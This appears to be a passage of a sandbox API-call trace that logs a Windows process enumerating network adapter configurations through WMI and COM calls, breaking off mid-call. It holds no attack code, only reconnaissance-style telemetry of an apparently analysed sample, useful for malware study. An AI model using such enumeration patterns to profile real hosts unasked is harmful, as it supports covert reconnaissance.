[0197.576] CoGetContextToken (in: pToken=0x26e678 | out: pToken=0x26e678) returned 0x0 [0197.576] CoGetContextToken (in: pToken=0x26e5d8 | out: pToken=0x26e5d8) returned 0x0 [0197.576] WbemDefPath:IUnknown:QueryInterface (in: This=0x521cbf0, riid=0x26e6a8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x26e6a4 | out: ppvObject=0x26e6a4*=0x521cbf0) returned 0x0 [0197.576] WbemDefPath:IUnknown:AddRef (This=0x521cbf0) returned 0x3 [0197.576] WbemDefPath:IUnknown:Release (This=0x521cbf0) returned 0x2 [0197.576] WbemDefPath:IWbemPath:SetText (This=0x521cbf0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=0") returned 0x0 [0197.576] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e828 | out: puCount=0x26e828*=0x2) returned 0x0 [0197.576] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e824*=0x0, pszText=0x0 | out: puBuffLength=0x26e824*=0xf, pszText=0x0) returned 0x0 [0197.576] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e824*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e824*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.576] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e7f4 | out: puCount=0x26e7f4*=0x2) returned 0x0 [0197.576] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e7f0*=0x0, pszText=0x0 | out: puBuffLength=0x26e7f0*=0xf, pszText=0x0) returned 0x0 [0197.576] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e7f0*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e7f0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.576] IWbemClassObject:Get (in: This=0x5228d78, wszName="IpEnabled", lFlags=0, pVal=0x26e7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2576d98*=0, plFlavor=0x2576d9c*=0 | out: pVal=0x26e7f0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2576d98*=11, plFlavor=0x2576d9c*=0) returned 0x0 [0197.577] IWbemClassObject:Get (in: This=0x5228d78, wszName="IpEnabled", lFlags=0, pVal=0x26e7f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2576d98*=11, plFlavor=0x2576d9c*=0 | out: pVal=0x26e7f8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2576d98*=11, plFlavor=0x2576d9c*=0) returned 0x0 [0197.579] CoTaskMemAlloc (cb=0x4) returned 0x717820 [0197.579] IEnumWbemClassObject:Next (in: This=0x5210bbc, lTimeout=-1, uCount=0x1, apObjects=0x717820, puReturned=0x2576450 | out: apObjects=0x717820*=0x5227618, puReturned=0x2576450*=0x1) returned 0x0 [0197.581] IUnknown:QueryInterface (in: This=0x5227618, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26de60 | out: ppvObject=0x26de60*=0x5227618) returned 0x0 [0197.581] IUnknown:QueryInterface (in: This=0x5227618, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26de1c | out: ppvObject=0x26de1c*=0x0) returned 0x80004002 [0197.581] IUnknown:QueryInterface (in: This=0x5227618, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26dc3c | out: ppvObject=0x26dc3c*=0x0) returned 0x80004002 [0197.581] IUnknown:AddRef (This=0x5227618) returned 0x3 [0197.581] IUnknown:QueryInterface (in: This=0x5227618, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26d77c | out: ppvObject=0x26d77c*=0x0) returned 0x80004002 [0197.581] IUnknown:QueryInterface (in: This=0x5227618, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26d72c | out: ppvObject=0x26d72c*=0x0) returned 0x80004002 [0197.581] IUnknown:QueryInterface (in: This=0x5227618, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d738 | out: ppvObject=0x26d738*=0x522761c) returned 0x0 [0197.581] IMarshal:GetUnmarshalClass (in: This=0x522761c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26d740 | out: pCid=0x26d740*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0197.581] IUnknown:Release (This=0x522761c) returned 0x3 [0197.581] CoGetContextToken (in: pToken=0x26d798 | out: pToken=0x26d798) returned 0x0 [0197.581] CoGetContextToken (in: pToken=0x26dba0 | out: pToken=0x26dba0) returned 0x0 [0197.581] IUnknown:QueryInterface (in: This=0x5227618, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dc30 | out: ppvObject=0x26dc30*=0x0) returned 0x80004002 [0197.582] IUnknown:Release (This=0x5227618) returned 0x2 [0197.582] CoGetContextToken (in: pToken=0x26e170 | out: pToken=0x26e170) returned 0x0 [0197.582] CoGetContextToken (in: pToken=0x26e0d0 | out: pToken=0x26e0d0) returned 0x0 [0197.582] IUnknown:QueryInterface (in: This=0x5227618, riid=0x26e1a0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x26e19c | out: ppvObject=0x26e19c*=0x5227618) returned 0x0 [0197.582] IUnknown:AddRef (This=0x5227618) returned 0x4 [0197.582] IUnknown:Release (This=0x5227618) returned 0x3 [0197.582] IUnknown:Release (This=0x5227618) returned 0x2 [0197.582] CoTaskMemFree (pv=0x717820) [0197.582] CoGetContextToken (in: pToken=0x26e4d8 | out: pToken=0x26e4d8) returned 0x0 [0197.582] IUnknown:AddRef (This=0x5227618) returned 0x3 [0197.582] IWbemClassObject:Get (in: This=0x5227618, wszName="__GENUS", lFlags=0, pVal=0x26e7ec*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e86c*=0, plFlavor=0x26e868*=0 | out: pVal=0x26e7ec*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x26e86c*=3, plFlavor=0x26e868*=64) returned 0x0 [0197.582] IWbemClassObject:Get (in: This=0x5227618, wszName="__PATH", lFlags=0, pVal=0x26e7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e854*=0, plFlavor=0x26e850*=0 | out: pVal=0x26e7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=1", varVal2=0x0), pType=0x26e854*=8, plFlavor=0x26e850*=64) returned 0x0 [0197.582] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=1") returned 0x80 [0197.582] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=1") returned 0x80 [0197.582] CoGetObjectContext (in: riid=0x224f510*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e7fc | out: ppv=0x26e7fc*=0x6ded34) returned 0x0 [0197.582] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ded34, pAptType=0x26e7f4 | out: pAptType=0x26e7f4*=1) returned 0x0 [0197.582] IUnknown:QueryInterface (in: This=0x6ded34, riid=0x224f4f8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x26e7f8 | out: ppvObject=0x26e7f8*=0x0) returned 0x80004002 [0197.582] IUnknown:Release (This=0x6ded34) returned 0x1 [0197.583] CoGetClassObject (in: rclsid=0x700824*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e168 | out: ppv=0x26e168*=0x5210a20) returned 0x0 [0197.583] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210a20, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26e380 | out: ppvObject=0x26e380*=0x0) returned 0x80004002 [0197.583] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5210a20, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e394 | out: ppvObject=0x26e394*=0x5210bf8) returned 0x0 [0197.583] WbemDefPath:IUnknown:Release (This=0x5210a20) returned 0x0 [0197.583] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210bf8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dfb4 | out: ppvObject=0x26dfb4*=0x5210bf8) returned 0x0 [0197.583] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210bf8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26df70 | out: ppvObject=0x26df70*=0x0) returned 0x80004002 [0197.583] WbemDefPath:IUnknown:AddRef (This=0x5210bf8) returned 0x3 [0197.583] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210bf8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26d8cc | out: ppvObject=0x26d8cc*=0x0) returned 0x80004002 [0197.583] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210bf8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26d87c | out: ppvObject=0x26d87c*=0x0) returned 0x80004002 [0197.584] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210bf8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d888 | out: ppvObject=0x26d888*=0x717820) returned 0x0 [0197.584] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x717820, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26d890 | out: pCid=0x26d890*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0197.584] WbemDefPath:IUnknown:Release (This=0x717820) returned 0x3 [0197.584] CoGetContextToken (in: pToken=0x26d8e8 | out: pToken=0x26d8e8) returned 0x0 [0197.584] CoGetContextToken (in: pToken=0x26dcf0 | out: pToken=0x26dcf0) returned 0x0 [0197.584] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210bf8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dd80 | out: ppvObject=0x26dd80*=0x0) returned 0x80004002 [0197.584] WbemDefPath:IUnknown:Release (This=0x5210bf8) returned 0x2 [0197.584] WbemDefPath:IUnknown:Release (This=0x5210bf8) returned 0x1 [0197.584] CoGetContextToken (in: pToken=0x26e678 | out: pToken=0x26e678) returned 0x0 [0197.584] CoGetContextToken (in: pToken=0x26e5d8 | out: pToken=0x26e5d8) returned 0x0 [0197.584] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210bf8, riid=0x26e6a8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x26e6a4 | out: ppvObject=0x26e6a4*=0x5210bf8) returned 0x0 [0197.584] WbemDefPath:IUnknown:AddRef (This=0x5210bf8) returned 0x3 [0197.584] WbemDefPath:IUnknown:Release (This=0x5210bf8) returned 0x2 [0197.584] WbemDefPath:IWbemPath:SetText (This=0x5210bf8, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=1") returned 0x0 [0197.584] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e828 | out: puCount=0x26e828*=0x2) returned 0x0 [0197.584] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e824*=0x0, pszText=0x0 | out: puBuffLength=0x26e824*=0xf, pszText=0x0) returned 0x0 [0197.584] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e824*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e824*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.584] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e7f4 | out: puCount=0x26e7f4*=0x2) returned 0x0 [0197.584] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e7f0*=0x0, pszText=0x0 | out: puBuffLength=0x26e7f0*=0xf, pszText=0x0) returned 0x0 [0197.584] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e7f0*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e7f0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.584] IWbemClassObject:Get (in: This=0x5227618, wszName="IpEnabled", lFlags=0, pVal=0x26e7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x25775d0*=0, plFlavor=0x25775d4*=0 | out: pVal=0x26e7f0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x25775d0*=11, plFlavor=0x25775d4*=0) returned 0x0 [0197.584] IWbemClassObject:Get (in: This=0x5227618, wszName="IpEnabled", lFlags=0, pVal=0x26e7f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x25775d0*=11, plFlavor=0x25775d4*=0 | out: pVal=0x26e7f8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x25775d0*=11, plFlavor=0x25775d4*=0) returned 0x0 [0197.585] CoTaskMemAlloc (cb=0x4) returned 0x717580 [0197.585] IEnumWbemClassObject:Next (in: This=0x5210bbc, lTimeout=-1, uCount=0x1, apObjects=0x717580, puReturned=0x2576450 | out: apObjects=0x717580*=0x5227a00, puReturned=0x2576450*=0x1) returned 0x0 [0197.586] IUnknown:QueryInterface (in: This=0x5227a00, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26de60 | out: ppvObject=0x26de60*=0x5227a00) returned 0x0 [0197.587] IUnknown:QueryInterface (in: This=0x5227a00, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26de1c | out: ppvObject=0x26de1c*=0x0) returned 0x80004002 [0197.587] IUnknown:QueryInterface (in: This=0x5227a00, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26dc3c | out: ppvObject=0x26dc3c*=0x0) returned 0x80004002 [0197.587] IUnknown:AddRef (This=0x5227a00) returned 0x3 [0197.587] IUnknown:QueryInterface (in: This=0x5227a00, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26d77c | out: ppvObject=0x26d77c*=0x0) returned 0x80004002 [0197.587] IUnknown:QueryInterface (in: This=0x5227a00, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26d72c | out: ppvObject=0x26d72c*=0x0) returned 0x80004002 [0197.587] IUnknown:QueryInterface (in: This=0x5227a00, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d738 | out: ppvObject=0x26d738*=0x5227a04) returned 0x0 [0197.587] IMarshal:GetUnmarshalClass (in: This=0x5227a04, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26d740 | out: pCid=0x26d740*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0197.587] IUnknown:Release (This=0x5227a04) returned 0x3 [0197.587] CoGetContextToken (in: pToken=0x26d798 | out: pToken=0x26d798) returned 0x0 [0197.587] CoGetContextToken (in: pToken=0x26dba0 | out: pToken=0x26dba0) returned 0x0 [0197.587] IUnknown:QueryInterface (in: This=0x5227a00, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dc30 | out: ppvObject=0x26dc30*=0x0) returned 0x80004002 [0197.587] IUnknown:Release (This=0x5227a00) returned 0x2 [0197.587] CoGetContextToken (in: pToken=0x26e170 | out: pToken=0x26e170) returned 0x0 [0197.587] CoGetContextToken (in: pToken=0x26e0d0 | out: pToken=0x26e0d0) returned 0x0 [0197.587] IUnknown:QueryInterface (in: This=0x5227a00, riid=0x26e1a0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x26e19c | out: ppvObject=0x26e19c*=0x5227a00) returned 0x0 [0197.587] IUnknown:AddRef (This=0x5227a00) returned 0x4 [0197.587] IUnknown:Release (This=0x5227a00) returned 0x3 [0197.587] IUnknown:Release (This=0x5227a00) returned 0x2 [0197.587] CoTaskMemFree (pv=0x717580) [0197.587] CoGetContextToken (in: pToken=0x26e4d8 | out: pToken=0x26e4d8) returned 0x0 [0197.587] IUnknown:AddRef (This=0x5227a00) returned 0x3 [0197.587] IWbemClassObject:Get (in: This=0x5227a00, wszName="__GENUS", lFlags=0, pVal=0x26e7ec*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e86c*=0, plFlavor=0x26e868*=0 | out: pVal=0x26e7ec*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x26e86c*=3, plFlavor=0x26e868*=64) returned 0x0 [0197.588] IWbemClassObject:Get (in: This=0x5227a00, wszName="__PATH", lFlags=0, pVal=0x26e7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e854*=0, plFlavor=0x26e850*=0 | out: pVal=0x26e7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=2", varVal2=0x0), pType=0x26e854*=8, plFlavor=0x26e850*=64) returned 0x0 [0197.588] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=2") returned 0x80 [0197.588] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=2") returned 0x80 [0197.588] CoGetObjectContext (in: riid=0x224f510*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e7fc | out: ppv=0x26e7fc*=0x6ded34) returned 0x0 [0197.588] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ded34, pAptType=0x26e7f4 | out: pAptType=0x26e7f4*=1) returned 0x0 [0197.588] IUnknown:QueryInterface (in: This=0x6ded34, riid=0x224f4f8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x26e7f8 | out: ppvObject=0x26e7f8*=0x0) returned 0x80004002 [0197.588] IUnknown:Release (This=0x6ded34) returned 0x1 [0197.589] CoGetClassObject (in: rclsid=0x700824*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e168 | out: ppv=0x26e168*=0x5228fc8) returned 0x0 [0197.589] WbemDefPath:IUnknown:QueryInterface (in: This=0x5228fc8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26e380 | out: ppvObject=0x26e380*=0x0) returned 0x80004002 [0197.589] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5228fc8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e394 | out: ppvObject=0x26e394*=0x521d4b0) returned 0x0 [0197.589] WbemDefPath:IUnknown:Release (This=0x5228fc8) returned 0x0 [0197.589] WbemDefPath:IUnknown:QueryInterface (in: This=0x521d4b0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dfb4 | out: ppvObject=0x26dfb4*=0x521d4b0) returned 0x0 [0197.589] WbemDefPath:IUnknown:QueryInterface (in: This=0x521d4b0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26df70 | out: ppvObject=0x26df70*=0x0) returned 0x80004002 [0197.589] WbemDefPath:IUnknown:AddRef (This=0x521d4b0) returned 0x3 [0197.589] WbemDefPath:IUnknown:QueryInterface (in: This=0x521d4b0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26d8cc | out: ppvObject=0x26d8cc*=0x0) returned 0x80004002 [0197.589] WbemDefPath:IUnknown:QueryInterface (in: This=0x521d4b0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26d87c | out: ppvObject=0x26d87c*=0x0) returned 0x80004002 [0197.589] WbemDefPath:IUnknown:QueryInterface (in: This=0x521d4b0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d888 | out: ppvObject=0x26d888*=0x717580) returned 0x0 [0197.589] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x717580, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26d890 | out: pCid=0x26d890*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0197.589] WbemDefPath:IUnknown:Release (This=0x717580) returned 0x3 [0197.589] CoGetContextToken (in: pToken=0x26d8e8 | out: pToken=0x26d8e8) returned 0x0 [0197.589] CoGetContextToken (in: 